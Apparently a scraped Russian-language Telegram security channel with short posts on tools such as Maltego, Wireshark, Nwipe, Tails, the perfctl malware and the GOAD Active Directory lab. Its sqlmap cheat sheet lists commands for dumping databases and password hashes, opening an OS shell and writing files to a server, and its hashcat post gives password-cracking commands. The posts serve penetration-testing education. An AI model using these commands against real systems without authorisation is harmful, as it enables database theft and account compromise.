Kali Linux
54.5K subscribers
1.06K photos
82 videos
13 files
1.1K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
🎮Maltego — продвинутый инструмент для построения и изучения связей между различными субъектами и объектами.

Инструмент часто используется в разведке на основе открытых источников для сбора информации о сайтах, аккаунтах, IP-адресах, доменах и пользователях. В статье покажу, как установить и использовать Maltego на различных операционных системах.

Возможности Maltego

- Maltego может использоваться для сбора информации о сайтах, аккаунтах, IP-адресах, доменах и многом другом. Информация может быть собрана из различных источников, включая социальные сети, публичные реестры, записи DNS и Dark Web2.
- Позволяет анализировать связи между объектами и субъектами. Это может быть полезно для выявления связей между киберпреступниками, поиска уязвимостей в системах и т.д.
- Отображает информацию в виде диаграмы, где наглядно видны связи между разными объектами. Это может помочь в визуализации сложных связей и сделать анализ более наглядным.
- Для удобства может группировать однотипные элементы. Это упрощает понимание при работе с большими массивами элементов.

Maltego уже установлен в Kali Linux по умолчанию. Для запуска Maltego на Kali Linux выполните следующие шаги:

- Откройте терминал и введите команду maltego.
- Введите свои учетные данные.

Официальный страница
Скачать

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍37🔥75
🐺 LibreWolf – это версия браузера Firefox, созданная независимыми разработчиками и направленная на обеспечение конфиденциальности и безопасности пользователей.

Хотя она появилась относительно недавно, в последнее время её популярность быстро растет. Браузер имеет открытый исходный код, ссылку на который можно найти на сайте разработчиков.

Для загрузки предлагаются 64-битная версия браузера для Windows в виде стандартного установщика и, в качестве альтернативы, портативное приложение в ZIP-архиве.

Если обычно вы пользуетесь Firefox, интерфейс программы покажется вам знакомым. Сразу бросается в глаза, что в качестве поисковой системы по умолчанию в LibreWolf используется DuckDuckGo, но её можно заменить другими поисковыми системами, считающимися безопасными: например, Searx или Qwant. Настройки браузера в целом аналогичны Firefox, никаких специфических опций в окне конфигурации браузера обнаружить не удалось.

В LibreWolf в целях безопас­ности заб­локиро­ван стан­дар­тный менед­жер паролей, но вмес­то него мож­но исполь­зовать сто­рон­ние пла­гины для Firefox. Так­же в бра­узе­ре вклю­чен так называ­емый режим Enhanced Tracking Protection, который бло­киру­ет некото­рые сто­рон­ние скрип­ты, если их не заб­локиро­вал пла­гин uBlock Origin.

https://codeberg.org/librewolf

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍448🔥2
💻 Шпаргалка по основным фильтрам Wireshark

🌟 Сохрани в избранное, чтобы не потерять!

Даже поверхностное знание программы Wireshark и её фильтров на порядок сэкономит время при устранении проблем сетевого или прикладного уровня. Wireshark полезен для многих задач в работе сетевого инженера, специалиста по безопасности или системного администратора. Вот несколько примеров использования:

Устранение неполадок сетевого подключения

- Визуальное отображение потери пакетов
- Анализ ретрансляции TCP
- График по пакетам с большой задержкой ответа

Извлечение файлов из сессий HTTP

- Экспорт объектов из HTTP, таких как JavaScript, изображения или даже исполняемые файлы

Извлечение файлов из сессий SMB

- Аналогично опции экспорта HTTP, но извлечение файлов, передаваемых по SMB, протоколу общего доступа к файлам в Windows

Обнаружение и проверка вредоносных программ

- Обнаружение аномального поведения, которое может указывать на вредоносное ПО
- Поиск необычных доменов или конечных IP
Графики ввода-вывода для обнаружения постоянных соединений (маячков) с управляющими серверами
- Отфильтровка «нормальных» данных и выявление необычных
Извлечение больших DNS-ответов и прочих аномалий, которые могут указывать на вредоносное ПО

Проверка сканирования портов и других типов сканирования на уязвимости

- Понимание, какой сетевой трафик поступает от сканеров
- Анализ процедур по проверке уязвимостей, чтобы различать ложноположительные и ложноотрицательные срабатывания

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥40👍247👏2👎1🤔1🎉1
This media is not supported in your browser
VIEW IN TELEGRAM
🖥 Nwipe — это мощнный интрумент, написанный на С для полного стирания данных на жестком диске.

Этот инструмент выполняет работу профессионально, как волшебная палочка в сфере защиты информации. Он позволяет обрабатывать сразу несколько дисков, предоставляя пользователю выбор между простым интерфейсом командной строки и удобным графическим интерфейсом.

Под крышкой у Nwipe находится множество способов надежного удаления данных: от стандартного метода заполнения нулями до продвинутых алгоритмов, таких как методы Министерства обороны США и Гутмана.

Если требуется максимальная безопасность, Nwipe использует псевдослучайные числа, генерируемые такими источниками, как Mersenne Twister и AES-CTR, заменяя исходные данные случайными символами.

Получить больше информации и руководство к использованию программы можно на официальном сайте или на GitHub: https://github.com/martijnvanbrummelen/nwipe

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍468🔥6
🧅 Tails OS объединяется с Tor Project для повышения безопасности и конфиденциальности 💥

Tails - инструмент, который предназначен для анонимного выхода в сеть. Для загрузки подготовлен iso-образ, способный работать в Live-режиме, размером 1 ГБ.


💡 Команды Tails OS и Tor Project официально объявили о слиянии для создания более мощной и защищенной экосистемы. Tails, известная своей операционной системой для анонимности, теперь будет работать под эгидой Tor, что обеспечит стабильность и ускорит развитие проекта. Это объединение позволит лучше интегрировать сетевые технологии Tor в Tails, а также даст возможность команде сосредоточиться на усилении приватности и создании более безопасных инструментов для пользователей, которые стремятся защитить свою цифровую свободу и конфиденциальность.

🌟 Такое сотрудничество станет значимым шагом в борьбе за открытый и безопасный интернет, который обеспечит надежную защиту активистов, журналистов и всех пользователей, нуждающихся в анонимности.

🔗 Подробнее можно прочитать тут: *клик*

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
44🔥24👍20👏4👎2🤔2
🔐 Шпаргалка по использованию sqlmap

SQLMAP — это инструмент для проникновения с открытым исходным кодом.

SQLMAP позволяет автоматизировать процесс выявления и последующего использования уязвимостей SQL-инъекций и последующего получения контроля над серверами баз данных .

Кроме того, SQLMAP поставляется с механизмом обнаружения, который включает расширенные функции для поддержки тестирования на проникновение.

🌟 Базовый скан URL на наличие уязвимостей:

sqlmap -u "http://example.com/page.php?id=1"


🌟 Автоматический дамп всех баз данных:

sqlmap -u "http://example.com/page.php?id=1" --dbs


🌟 Извлечение таблиц из конкретной базы данных:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных --tables


🌟 Извлечение данных из конкретной таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --dump


🌟 Обход WAF (брандмауэра) с помощью указания пользовательского заголовка User-Agent:

sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0"


🌟 Подбор базы данных и получение информации о пользователях:

sqlmap -u "http://example.com/page.php?id=1" --current-db --current-user


🌟 Включение интерактивной оболочки (OS Shell) для удаленного выполнения команд:

sqlmap -u "http://example.com/page.php?id=1" --os-shell


🌟 Выполнение SQL-запросов вручную:

sqlmap -u "http://example.com/page.php?id=1" --sql-query "SELECT user, password FROM users"


🌟 Проверка на возможность подключения с правами администратора:

sqlmap -u "http://example.com/page.php?id=1" --is-dba


🌟 Брутфорсирование паролей пользователей:

sqlmap -u "http://example.com/page.php?id=1" --passwords


🌟 Загрузка файла на удаленный сервер:

sqlmap -u "http://example.com/page.php?id=1" --file-write="/path/to/local/file" --file-dest="/path/to/remote/file"


🌟 Получение списка столбцов из таблицы:

sqlmap -u "http://example.com/page.php?id=1" -D имя_базы_данных -T имя_таблицы --columns


🌟 Использование прокси-сервера:

sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"


🌟 Определение используемой базы данных и версии:

sqlmap -u "http://example.com/page.php?id=1" --banner


🌟 Атака на POST-запросы (если параметры передаются в теле):

sqlmap -u "http://example.com/login.php" --data="username=admin&password=admin"


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6822🔥8🥰1
🔐 Hashcat — это мощный инструмент для взлома паролей с помощью методов перебора и атаки на хэши

🌟 Hashcat предустановлен на Kali Linux

💡 Вот небольшая шпаргалка по основным командам:

💻 Базовая команда:

hashcat [параметры] [хэши] [словарь/маска]

⚙️ Основные параметры:

-m — Тип хэша:

0 — MD5
100 — SHA-1
1400 — SHA-256
1800 — SHA-512
1000 — NTLM (Windows)

-a — Тип атаки:

0 — словарная атака
1 — комбинированная атака
3 — маска (брутфорс)
6 — словарь + маска
7 — маска + словарь
--help — выводит справку по командам и параметрам.

--show — показывает уже найденные пароли из предыдущих атак.

--status — показывает прогресс текущей атаки.

🔐 Примеры использования
Словарная атака (Dictionary Attack):

```shell
hashcat -m 0 -a 0 hashes.txt wordlist.txt```
-m 0 — указывает тип хэша (MD5).
-a 0 — указывает тип атаки (словарь).
hashes.txt — файл с хэшами.
wordlist.txt — словарь с возможными паролями.

🌟 Брутфорс по маске (Brute-Force Mask Attack):

hashcat -m 1000 -a 3 hash.txt ?d?d?d?d?d

?d — любая цифра (0-9).
Маска ?d?d?d?d?d — ищет 5-значные пароли (например, 12345).
Маски:

?d — цифры (0-9)
?l — строчные буквы (a-z)
?u — прописные буквы (A-Z)
?s — символы (!, @, #, и т.д.)
?a — любые символы

🌟 Комбинированная атака (Combination Attack):

hashcat -m 0 -a 1 hashes.txt wordlist1.txt wordlist2.txt

wordlist1.txt и wordlist2.txt — словари, которые комбинируются для подбора пароля.

🌟 Атака словарь + маска (Hybrid Attack):

hashcat -m 0 -a 6 hashes.txt wordlist.txt ?d?d

Применяет маску ?d?d к каждому слову из wordlist.txt. Например, password превратится в password00, password01, и т.д.

🌟 Использование собственного правила:

hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/best64.rule

-r rules/best64.rule — применяет правила трансформации к каждому слову в словаре (например, добавление цифр или символов к слову)

https://www.kali.org/tools/hashcat/

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5617🔥5
🔐 Быстрый Совет дня: Как узнать, когда последний раз кто то входил в систему на этом устройстве?

Просто введите что то из этого:



$ last {имя}

🌟 Команда last покажет все входы в систему
🌟 Команда last Name покажет все входы в систему пользователя Name
🌟 Чтобы отобразить только несколько последних входов, используйте last | less

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5112🔥5😱4
🧅 ahmia.fi — мощная поисковая система в сети Tor

🌟 Ищет любые .onion ссылки.

🔗 Ссылка: *клик*

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍44🔥117
🕘 Timeshift — это инструмент восстановления системы для Linux, который схож по функциям с System Restore в Windows и Time Machine в macOS.

Он создан для защиты системных файлов путем создания последовательных снимков файловой системы с помощью rsync+hardlinks или снимков BTRFS через определенные промежутки времени.

Эти снимки могут быть использованы для отмены изменений в системе, если возникнет необходимость вернуться к предыдущему состоянию.

Важно отметить, что Timeshift работает именно с системными файлами и настройками, игнорируя личные данные пользователей, такие как документы и музыкальные файлы, которые сохраняются независимо от процесса восстановления системы.

sudo apt-get update
sudo apt-get install timeshift


🔗 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍496🔥6
🥷 Вредоносная программа для Linux под названием «perfctl» атакует серверы и рабочие станции Linux уже как минимум три года, оставаясь практически незамеченной благодаря высокому уровню уклонения и использованию руткитов

🌟 Основная цель perfctl — криптомайнинг, использование скомпрометированных серверов для добычи трудноотслеживаемой криптовалюты Monero. Однако его можно легко использовать для более разрушительных операций

🌟 При запуске perfctl открывает сокет Unix для внутренних коммуникаций и устанавливает зашифрованный канал с серверами злоумышленника через TOR, что делает невозможным расшифровку обмена.

🌟 Затем он устанавливает руткит под названием «libgcwrap.so», который подключается к различным системным функциям для изменения механизмов аутентификации и перехвата сетевого трафика по мере необходимости для облегчения обхода системы безопасности.

💡 Также развертываются дополнительные пользовательские руткиты, заменяющие утилиты ldd, top, crontab и lsof троянизированными версиями, что опять же препятствует прямому обнаружению активности вредоносного ПО.

🌟 Наконец, в систему устанавливается майнер XMRIG, который запускается для майнинга Monero с использованием ресурсов ЦП сервера

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍147😱4
🔝 Awesome Sysadmin

Тщательно отобранный перечень ресурсов и инструментов, предназначенных для системных администраторов. Это очень удобный и практический перечень для админов.

В нем собраны различные утилиты для автоматизации процесса сборки, создания резервных копий, проверки кода и других задач.

Полный список доступен для ознакомления в репозитории:

Github

@linuxkalii
23👍12🔥2
Kali Linux - это дистрибутив, ориентированный на безопасность ... так что вы должны полностью доверять этому банкомату, не так ли? 😌

@linuxkalii
😁216👍27🔥107🤯5😱3
🔪 USBArmyKnife

Это идеальный инструмент для быстрого доступа для тестеров на проникновение и сотрудников red team.

Обладает широкими возможностями, включая атаки через USB HID, эмуляцию систем хранения данных, сетевые устройства и уязвимости Wi-Fi/Bluetooth (с использованием ESP32 Marauder).

Управляйте и развертывайте свои атаки без особых усилий, используя только телефон и удобный веб-интерфейс Bootstrap.

Вы даже можете просматривать экран жертвы через специальное Wi-Fi-соединение на устройстве.

Вооружитесь армейским ножом USB и поднимите свой набор инструментов для локального доступа на новый уровень.

Язык: JavaScript
Stars: 140 Issues: 6 Forks: 9

git clone https://github.com/i-am-shodan/usb-army-knife.git

Github

@linuxkalii
👍52🔥1513
🔐 Поисковые системы для пентестеров!

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥66👍206
⚡️ Обновления Firefox 131.0.2 и Tor Browser 13.5.7 с устранением критической уязвимости

Опубликованы корректирующие версии Firefox 131.0.2, Firefox ESR 115.16.1, Firefox ESR 128.3.1 и Tor Browser 13.5.7, которые устраняют критическую уязвимость (CVE-2024-9680).

Эта уязвимость приводит к выполнению вредоносного кода на уровне процесса обработки контента при посещении специально подготовленных веб-страниц.

Проблема связана с неправильным использованием освобожденной памяти (use-after-free) в реализации API AnimationTimeline, который используется для синхронизации и управления анимациями на веб-страницах.

Особенную опасность представляет тот факт, что компания ESET выявила случаи использования этой уязвимости в реальных атаках еще до выхода обновления (0-day). Подробности об уязвимости пока не разглашаются.

Также стоит отметить проблемы в версии Firefox 131, вызывающие нарушения в отображении элементов интерфейса при запуске браузера в окружениях на основе X11/Xorg без композитного сервера. В частности, могут исчезать тени и скругления всплывающих окон, а также может появляться черный фон вместо прозрачности на индикаторе прокрутки.

@linuxkalii
25👍17🔥6
⚡️ GOAD — одна из самых актуальных и самодостаточных тестовых инстурментов для пентеста окружения на базе Active Directory.

Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:

• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие

🔗 Ссылка на GitHub
👍33🔥76😁1